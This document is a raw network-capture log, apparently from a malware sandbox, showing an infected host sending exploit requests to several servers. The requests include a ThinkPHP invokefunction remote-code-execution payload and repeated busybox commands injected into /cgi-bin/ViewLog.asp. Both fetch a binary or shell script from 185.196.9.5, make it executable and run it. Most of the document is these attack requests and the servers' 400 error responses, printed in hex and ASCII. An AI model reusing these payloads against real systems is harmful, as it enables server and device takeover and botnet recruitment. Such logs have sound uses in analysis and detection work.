Feb 25, 2024 19:03:49.357906103 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:49.681395054 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:03:49 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
549	192.168.2.15	48182	31.136.93.255	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:50.730123043 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:51.301717997 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:52.453788042 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:54.853957891 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:59.461764097 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:08.677613020 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:28.133460999 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:04.997055054 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
550	192.168.2.15	37308	95.182.234.169	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:50.913616896 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:51.104218006 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:50 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:51.581835985 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:50 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:52.191736937 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:50 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:53.296633959 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:50 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:55.509932041 CET	536	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:50 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></
Feb 25, 2024 19:03:57.719969988 CET	536	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:50 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></
Feb 25, 2024 19:03:59.931322098 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:50 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:04.358062029 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:50 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
